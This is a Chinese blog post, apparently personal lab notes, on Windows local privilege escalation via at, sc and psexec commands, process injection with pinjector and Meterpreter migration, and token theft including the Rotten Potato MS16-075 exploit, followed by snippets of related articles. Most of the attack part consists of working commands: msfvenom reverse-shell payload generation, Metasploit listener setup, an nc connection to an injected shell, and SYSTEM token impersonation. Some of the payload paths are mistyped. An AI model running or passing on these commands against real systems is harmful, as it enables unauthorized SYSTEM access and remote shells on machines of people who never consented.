windows提权之at&sc&ps&进程注入&令牌窃取

已于 2023-03-20 22:03:14 修改
阅读量789 收藏 2
点赞数
分类专栏: windows+linux提权 文章标签: windows 服务器 网络 网络安全 Powered by 金山文档
于 2023-03-20 21:01:27 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62207170/article/details/129675389
版权

0x01 AT&SC&PS命令提权

1.at命令提权

at是一个计划任务的命令,当调用计划任务是以system权限运行的,就实现提权

当取得普通用户可以登录时可以使用此方法提权,本地用户提权

win2003及以下版本试用

环境:win2003

at 16:40 /interactive cmd #在生成system权限的cmd

2、sc命令提权

sc是用于与服务控制管理器和服务进行通信的命令行程序。提供的功能类似于控制面板中管理工具项中的服务。

适用版本:windows 7、8、03、08、12、16

当取得普通用户可以登录时可以使用此方法提权,本地用户提权

windows2003 成功,但是其他版本没有成功

环境:win2003

#创建一个名叫syscmd的新的交互式的cmd执行服务
sc Create syscmd binPath= "cmd /K start" type= own type= interact
#运行服务
sc start syscmd

3、ps提权

pstools是微软官方自带的工具,可以用来帮助管理系统

当取得普通用户可以登录时可以使用此方法提权,本地用户提权

环境:win2016

psexec.exe -accepteula -s -i -d cmd #调用运行cmd

0x02 进程迁移注入提权

注入到其他以system运行的进程中

当取得普通用户可以登录时可以使用此方法提权,本地用户提权

1.pinjector进程注入

环境:win2003

工具:pinjector

pinjector -l
pinjector -p 420 cmd 3344
nc 192.168.46.149 3344

2.MSF进程注入

环境:win2016 administrator

进行进程注入时,当权限过低时是迁移失败的

#生成木马
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.85.129 LPORT=3333 -f exe -o msf.exe
开启监听
use multi/handler
set payload windows/windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 3333
#进程注入
ps   //查看进程
migrate PID   //迁移对应PID,找是system的权限运行的进程

0x03 令牌窃取提权

假冒令牌可以假冒一个网络中的另一个用户进行各类操作。

所以当一个攻击者需要域管理员的操作权限时候,需通过假冒域管理员的令牌进行攻击。

1.令牌窃取提权

环境:Win2008 administator

当取得普通用户可以登录时可以使用此方法提权,本地用户提权

进行令牌窃取时,当权限过低时是窃取失败的,找不到system的令牌

#生成木马
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.85.129 LPORT=3333 -f exe -o msf.exe
#开启监听
use multi/handler
set payload windows/windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 3333
#进行令牌窃取
use incognito
list_tokens -u           #列出有的令牌
impersonate_token "NT AUTHORITY\SYSTEM" #窃取system令牌

2.烂土豆ms16-075提权

烂土豆本质上其实也是一种令牌窃取类型的提权

烂土豆可以本地也可以在web上提权

环境:win7+iis+asp iis低权限用户

#生成木马
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.85.129 LPORT=3333 -f exe -o msf.exe
#开启监听
use multi/handler
set payload windows/windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 3333
#进行令牌窃取
execute -cH -f ./potato.exe //配合烂土豆
use incognito
list_tokens -u
impersonate_token "NT AUTHORITY\SYSTEM"

或使用msf对应的模块

#生成木马
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.85.129 LPORT=3333 -f exe -o msf.exe
#开启监听
use multi/handler
set payload windows/windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 3333
#使用烂土豆
use exploit/windows/local/ms16_075_reflection-juicy
set session 1
set lhost 0.0.0.0
run

但是如果用户是本地非administrator用户,有这个漏洞也是利用失败的

需要是以下用户才可以成功提权

管理员(admininstrator)或者本地的服务账户

由服务控制管理器启动的服务

由组件对象模型 (COM) 基础结构启动的并配置为在特定帐户下运行的COM服务器

IIS与SqlServer用户

参考文章:

Windows系列本地提权面试相关问题汇总 - FreeBuf网络安全行业门户

mushangqiujin
关注
专栏目录
权限提升——windows进程注入&令牌窃取&土豆&BypassUAC&DLL文件劫持&不带引号服务路径
m0_61506558的博客
01-15 925
RottenPotato (烂土豆)提权的原理可以简述如下: 1.欺骗“NT AUTHORITY\SYSTEM”账户通过NTLM认证到我们控制的TCP终端。 2.对这个认证过程使用中间人攻击(NTLM重放),为“NTAUTHORITY\SYSTEM”账户本地协商一个安全令牌。这个过程是通过—系列的Windows API调用实现的。 3.模仿这个令牌。只有具有“模仿安全令牌权限”的账户才能去模仿别人的令牌。一般大多数的服务型账户(IIS、MSSQL等)有这个权限,大多数用户级的账户没有这个权限。
Windows提权---MSF/令牌窃取/系统服务权限配置错误提权
qq_40012781的博客
07-02 2366
提权是指把普通用户的权限进行提升至高权限的过程,也叫特权提升
本地用户提权-AT&SC&PS命令提权
weixin_45701675的博客
11-18 589
at命令提权的原理 at命令是一个计划命令,可以在规定时间完成一些操作,这个命令调用system权限。 适用版本:Win2000 & Win2003 & XP中还是存在的,在Win7以后被剔除. 当我们拿到低权限的用户,通过连接上服务器后,可以通过at命令来进行本地提权。 测试主机:win2003 at 11:00 /interactive cmd (在11:00分生成一个交互式的System权限的cmd) 如果设定时间过时,将于次日执行。 提权system成功 ..
Windows令牌窃取提权和烂土豆提权学习
Goodric的博客
07-24 1793
令牌,又叫token,是系统临时产生的秘钥,相当于账号密码,用来决定是否允许此次请求和判断此次请求是属于哪一个用户。令牌无需提供密码或其他凭证,就可以访问网络和系统资源,这些令牌持续于系统中,除非系统重新启动。令牌的最大特点就是随机性,不可预测,无法猜解。当不同的用户登录计算机后,都会生成一个访问令牌,这个Token在用户创建进程或线程时还会被使用,并不断进行拷贝,一般用户双击运行⼀个进程都会拷贝explorer.exe中的AccessToken令牌的分类。...
Windows 进程权限浅谈 -- 提权 / 降权
最新发布
因热爱而执着,因执着而成功。
07-24 127
如何以编程方式控制进程的执行级别?如果登录用户是管理员账户,且开启了UAC,那么默认情况下双击一个程序时是以medium权限运行,称为受限的管理员权限,如果右键程序“以管理员权限运行”,那么程序是high权限,称为不受限的管理员权限。以产品更新为例,大部分时候产品主程序以在标准(非提升)级别运行,为了能够自我更新,它需要启动一个单独的更新进程,该更新进程需要提升才能正确执行升级。还是以产品更新为例,当以提升级别运行的更新程序完成更新任务,需要启动产品主进程,以标准(非提升)级别运行,此时则需要降权。
Windows令牌窃取提权
zzlx123的博客
03-11 2438
令牌(Token) 令牌(token)是系统的临时秘钥,相当于账号和密码,用来决定是否允许这次请求和判断这次请求是属于哪一个用户的。它允许你在不提供密码或其他凭证的前提下,访问网络和系统资源,这些令牌将持续存在于系统中,除非系统重新启动。令牌最大的特点就是随机性,不可预测,黑客或软件无法猜测出令牌。 假冒令牌可以假冒一个网络中的另一个用户进行各类操作。所以当一个攻击者需要域管理员的操作权限时候,需...
提权注入进程提权
weixin_34008784的博客
12-31 604
注入进程提权【相当于开了一个后门,隐蔽性极高,不会创建新的进程,很难发现】 注入到system用户的进程,当管理员账户或其他账户注销后,后门仍然存在。可以理解为将pinjector注入到其他用户的进程里一起运行,进而同时拥有了对应的权限。 下面是图文教程。 0x01 从http://www.tarasco.org/security/Process_Injector/ 下载pinjecto...
windows本地提权--令牌窃取&烂土豆&UAC
金灰的博客
04-23 479
免责声明:本文仅做技术交流与学习,请知法守法,不要乱搞破坏等等...本地--->system。
权限提升-Windows本地提权-AT+SC+PS命令-进程迁移-令牌窃取-getsystem+UAC
xiaoheizi的博客
08-30 1485
进程迁移注入提权就是将获取到权限低的进程注入进程中权限高的中,这样就实现了权限提升,同时注入进程提权相当于开启了一个后门, 隐蔽性极高,不会创建新的进程,很难发现。操作数据库的权限,数据库的增删改等,源码或配置文件泄漏,也可能是网站权限(webshell)进行的数据库配置文件读取获得。原理:把我的进程注入到一个现有的system账号运行的进程中,这样我的进程也就具有了system账号的权限了。程序路径:Potato/source/Potato/Potato/bin/Release/Potato.exe。
Kali linux 学习笔记(二十一)提权——本地提权(at、sc、Sysinternals Suite 套件、注入进程) 2020.3.3
闵行小鱼塘
03-03 1747
初步控制目标机后,要提升权限,本节简单介绍几种本地提权方法
Windows Service服务程序的原理及实现(0)服务主函数 & 控制处理函数
热门推荐
机器学习
04-29 1万+
摘要: 何为服务?Windows 会话中可长时间运行的可执行应用程序。这些服务可以在计算机启动时自动启动,可以暂停和重新启动而且不显示任何用户界面。这种服务非常适合在服务器上使用,或任何时候,为了不影响在同一台计算机上工作的其他用户,需要长时间运行功能时使用。一个服务首先是一个Win32可执行程序,如果要写一个功能完备且强大的服务,需要熟悉动态连接库(DLL)、结构异常处理、内存映射文件、虚拟内存、
权限提升-windows令牌窃取烂土豆-引号路径提权
告白的博客
09-09 423
0x00 提权方式简介 总结几种除开补丁本地提权的另外几种比较使用的windwos提权 1)烂土豆配合令牌窃取提权--------webshell提权本地system 2)不安全的引号服务路径提权------本地提权 以及其他的dll劫持,accesschk64提权–本地提权,Alwayslnstallelevated提权等等 这种重点介绍烂土豆与不安全的引号路径提权,其他使用起来比较鸡肋,可自行百度学习 0x01 提权实战 1)烂土豆配合令牌窃取webshell到system 使用kali生成后门文件,上
Windows权限提升—令牌窃取、UAC提权进程注入提权
剁椒鱼头没剁椒的博客
03-27 4387
在之前的文章中已经对Windows的权限提升进行了介绍,这里同样不再赘述,如果想要去了解Windows权限提升可以看以下的文章,同时也将Windows权限提升其它的几种办法也放在下面的文章中。同时本来应该还写一篇第三方全家提权的,但是在实际测试过程中发现,有些第三方提权,如果在电脑上都会自动更新,比如向日葵,低版本的直接无法连接向日葵官方的服务器,那么提个毛权限的啊。Windows权限提升—溢出提权Windows权限提升—MySQL数据库提权
提权 - Windows 令牌窃取/进程注入提权
acepanhuan的博客
03-01 618
提权 - Windows 令牌窃取/进程注入提权
02-权限提升-Win溢出漏洞及AT&SC&PS提权
qq_56414082的博客
05-04 818
明确权限提升基础知识:权限划分明确权限提升环境问题:web及本地明确权限提升方法针对:针对方法适应问题明确权限提升针对版本:个人及服务器版本;针对方法;Windows系统内置了许多本地用户组,这些用户组本身都已经被赋予一些权限(permissions),它们具有管理本地计算机或访问本地资源的权限。只要用户账户加入到这些本地组内,这些用户账户也将具备该组所拥有的权限。
烂土豆+令牌窃取提权
kimojinmmp的博客
04-03 220
烂土豆+令牌窃取提权(win2008及之前可以直接使用令牌窃取提权) potato.exe:https://github.com/SecWiki/windows-kernel-exploits/blob/master/MS16-075/potato.exe # 1.生成shell上传到目标主机 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.106.150 LPORT=4433 -f exe -o 4433.exe # 2.开启msf u
权限提升-令牌窃取&进程注入-提权
weixin_45701675的博客
11-19 400
令牌窃取 演示服务器: Win2012 腾讯云服务器 假冒令牌可以假冒一个网络中的另一个用户进行各类操作。 所以当一个攻击者需要域管理员的操作权限时候,需通过假冒域管理员的令牌进行攻击。 本地权限 - Test in Win2012腾讯云服务器 msfvenom -p windows/meterpreter/reverse_tcp LHOST=47.94.236.117 LPORT=3333 -f exe -o msf.exe 配置监听会话 use exploit/multi/han...
烂土豆搭配令牌窃取提权&dll劫持搭配令牌窃取提权&不带引号服务路径问题提权&不安全的服务权限配置提权
weixin_46626159的博客
03-21 1021
烂土豆搭配令牌窃取提权&dll劫持搭配令牌窃取提权&不带引号服务路径问题提权&不安全的服务权限配置提权
提权
joosonmao的专栏
04-15 1680
用http://www.microsoft.com/china/technet/sysinternals/utilities/pstools.mspx的PsExec提升explorer权限,或提升cmd权限在命令提示符下删 1.PsExec命令提升进程特权 我们可以借助PsExec命令工具以SYSTEM身份运行进程。我们已经知道只有SYSTEM帐户才能访问C:\System Volume
第101天:权限提升-Win本地用户&进程注入&令牌窃取&AT&SC&PS服务命令
09-15
权限提升是一种操作系统安全漏洞利用技术,通过提升用户或进程的权限来获取更高的操作权限。针对Windows本地用户的权限提升,可以使用进程注入令牌窃取以及AT、SCPS服务命令等方法。进程注入是指将恶意代码注入到系统进程中,从而获取系统权限。令牌窃取指利用某些漏洞获取管理员权限令牌,然后使用这些令牌执行操作。AT、SCPS服务命令是Windows系统中的命令行工具,可以用于创建和管理计划任务、服务和进程。 在Windows本地环境下,可以使用这些方法进行权限提升。具体而言,可以通过系统溢出漏洞、AT命令、SC命令和PS命令等来实现。其中,系统溢出漏洞是指利用程序或操作系统中的漏洞,使程序或操作系统的行为超出设计时的预期,从而实现对系统的控制。AT命令是用于创建和管理计划任务的命令,SC命令是用于创建和管理服务的命令,PS命令是用于管理进程的命令。 对于具体的案例,我们可以通过判断使用哪种溢出漏洞以及在哪里找到漏洞,来选择合适的方法进行权限提升。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值